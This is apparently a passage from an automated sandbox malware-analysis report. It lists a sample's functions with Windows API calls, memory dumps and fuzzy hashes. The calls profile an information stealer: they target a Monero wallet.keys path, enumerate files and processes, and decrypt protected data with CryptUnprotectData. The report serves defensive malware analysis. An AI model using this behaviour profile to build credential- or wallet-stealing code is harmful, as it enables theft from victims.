                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B00D73), ref: 00AEE4A2
                          • StrCmpCA.SHLWAPI(?,00B014F8), ref: 00AEE4F2
                          • StrCmpCA.SHLWAPI(?,00B014FC), ref: 00AEE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AEEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 6366e01747d489f98088066233b06d5852a14dd397272cf98fbca4df36bc0d53
                          • Instruction ID: 188571c68032bec998f0b0a63a3229f1d3f9acdb00d947b8fd1e3ff5b6fbf988
                          • Opcode Fuzzy Hash: 6366e01747d489f98088066233b06d5852a14dd397272cf98fbca4df36bc0d53
                          • Instruction Fuzzy Hash: 131232B191011C9ADB14FBA0DE96EFD7378AF64340F4045A8B60E96191EF706F49CBE2
                          Function 00EB8D4F Relevance: 9.1, Strings: 6, Instructions: 1596COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: :3=$5|zq$5|zq$:m'x$vu~$Omg
                          • API String ID: 0-1213974718
                          • Opcode ID: c618ae6a6d0f81e8ad5440769ad2cea72dc2ad58090b7c5d01690d430d549e31
                          • Instruction ID: 4a22d8c3aaf33bd7230b79e8e42aaccb87aed38354a71b44bb7e1c78821f16c3
                          • Opcode Fuzzy Hash: c618ae6a6d0f81e8ad5440769ad2cea72dc2ad58090b7c5d01690d430d549e31
                          • Instruction Fuzzy Hash: FAB2F3F360C2049FE304AE29EC8567AFBE9EF94720F1A893DE6C4C3744E63598458657
                          Function 00EA8404 Relevance: 7.9, Strings: 5, Instructions: 1666COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .J&~$PK{U$d6o$yw#$B}?
                          • API String ID: 0-3495107319
                          • Opcode ID: 4008d8d57fa5ee3a0f13b474fe6ace5fb56842f18f2c3d5957759c313f6d03e3
                          • Instruction ID: 24cc8386949c9d749d6ee34e3dc70d42e086c5fa5f9a7a515cb52b15d991d401
                          • Opcode Fuzzy Hash: 4008d8d57fa5ee3a0f13b474fe6ace5fb56842f18f2c3d5957759c313f6d03e3
                          • Instruction Fuzzy Hash: 45B22AF3A082109FE304AE2DEC8567AFBE5EFD4720F1A853DEAC4D3744E67558018696
                          Function 00AEC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AEC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AEC87C
                          • lstrcat.KERNEL32(?,00B00B46), ref: 00AEC943
                          • lstrcat.KERNEL32(?,00B00B47), ref: 00AEC957
                          • lstrcat.KERNEL32(?,00B00B4E), ref: 00AEC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 8dec1cd4386b7da9192a55c4765a3efcdff1272f5eb556cd04a1accadaa876ea
                          • Instruction ID: 9d0b11fd80d79212620695c37b98b5ac9ae27de3711bdf2d925ec9e875ce55ef
                          • Opcode Fuzzy Hash: 8dec1cd4386b7da9192a55c4765a3efcdff1272f5eb556cd04a1accadaa876ea
                          • Instruction Fuzzy Hash: B0415CB590421ADBDB20DFA4DD89BEEB7B8FB48304F1041A8E509A7280D7705A85CFA1
                          Function 00AE7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AE724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AE7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AE7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AE72A4
                          • LocalFree.KERNEL32(?), ref: 00AE72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: dd3852b10f32bd883ad401ab5fd8c7ebdb67ca5093ab12c87d421995833da813
                          • Instruction ID: 49620dbfa3a21cc799c8152e5e383ddb1a37b693ee76cf136439c2199924e0b6
                          • Opcode Fuzzy Hash: dd3852b10f32bd883ad401ab5fd8c7ebdb67ca5093ab12c87d421995833da813
                          • Instruction Fuzzy Hash: 02010075A40308BBDB24DBD8DD46F9DB7B8EB44700F104155FB05EB2C0D670AA018B65
                          Function 00AF9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AF961E
                          • Process32First.KERNEL32(00B00ACA,00000128), ref: 00AF9632
                          • Process32Next.KERNEL32(00B00ACA,00000128), ref: 00AF9647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00AF965C
                          • CloseHandle.KERNEL32(00B00ACA), ref: 00AF967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: aaad46ca6661cc001c8154175eb480f4c93540b38c6dd4718445e4c60434ccb1
                          • Instruction ID: a9824348b0784b74a91ad1189b3a2d4de65727586e705cb051641ce3a7433cb4
                          • Opcode Fuzzy Hash: aaad46ca6661cc001c8154175eb480f4c93540b38c6dd4718445e4c60434ccb1
                          • Instruction Fuzzy Hash: E501E975A00208ABCB64DFA5C948BEEBBF9EB58340F104198AA05D7340DB349A45CF62
                          Function 00EB784C Relevance: 7.3, Strings: 5, Instructions: 1090COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !|~[$)3$/%_o$5%Kw$l7_
                          • API String ID: 0-93576352
                          • Opcode ID: 4c76e5a54440c369ee0e848a86a418a67224ae7de7f7de55cc570934b4912f1c
                          • Instruction ID: 14bb589e99a69357dce56b5f8d36cbb9858e96d5468ec35a30e03c644cdfc3fc
                          • Opcode Fuzzy Hash: 4c76e5a54440c369ee0e848a86a418a67224ae7de7f7de55cc570934b4912f1c
                          • Instruction Fuzzy Hash: F47228F3A0C2049FD3046E2DEC8567AF7E9EF94720F1A893DEAC4C7344EA7558058696
                          Function 00EA690A Relevance: 6.6, Strings: 4, Instructions: 1631COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: E<O[$\e$y83o$W_
                          • API String ID: 0-392019181
                          • Opcode ID: 4d4812e7639ec6718f455d946265bfe6a1b05cd69e574cca168d3792f15c759c
                          • Instruction ID: a27c43a15a04d55a3a289217f9551314e6136ba25ef9c26aba2f455688e36645
                          • Opcode Fuzzy Hash: 4d4812e7639ec6718f455d946265bfe6a1b05cd69e574cca168d3792f15c759c
                          • Instruction Fuzzy Hash: 64B2F7F3A082009FE3046E2DEC8567AFBE5EFD4720F1A893DE6C4C7744E63598458696
                          Function 00AF8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B005B7), ref: 00AF86CA
                          • Process32First.KERNEL32(?,00000128), ref: 00AF86DE
                          • Process32Next.KERNEL32(?,00000128), ref: 00AF86F3
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                          • CloseHandle.KERNEL32(?), ref: 00AF8761
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: cbc34272d731fcefde34092cf01d5ba7273eea42f5ed528b190c53c580f70ac2
                          • Instruction ID: f377cc223def2ac79af897aeb828578f7508db4142883cbdb6bd98e4d0167798
                          • Opcode Fuzzy Hash: cbc34272d731fcefde34092cf01d5ba7273eea42f5ed528b190c53c580f70ac2
                          • Instruction Fuzzy Hash: 43316DB190121CABCB24EF94CD45FEEB778EF54740F1041A9F20EA61A0DB746A45CFA1
                          Function 00AF8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00AE5184,40000001,00000000,00000000,?,00AE5184), ref: 00AF8EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: a8de6ba810ed0bcd7822eda7e9069ef8bbd17f03e425117ccd9fc3e1e9d72368
                          • Instruction ID: 9b847ec433d6b3da5f670974030b674cd44331d666bf8bb159f68a930faa905b
                          • Opcode Fuzzy Hash: a8de6ba810ed0bcd7822eda7e9069ef8bbd17f03e425117ccd9fc3e1e9d72368
                          • Instruction Fuzzy Hash: 3A110670200208AFDB00CFA4D885FBA33A9EF89700F109448FA198B250DB79E841DB60
                          Function 00AE9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AE4EEE,00000000,00000000), ref: 00AE9B2A
                          • LocalFree.KERNEL32(?,?,?,?,00AE4EEE,00000000,?), ref: 00AE9B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
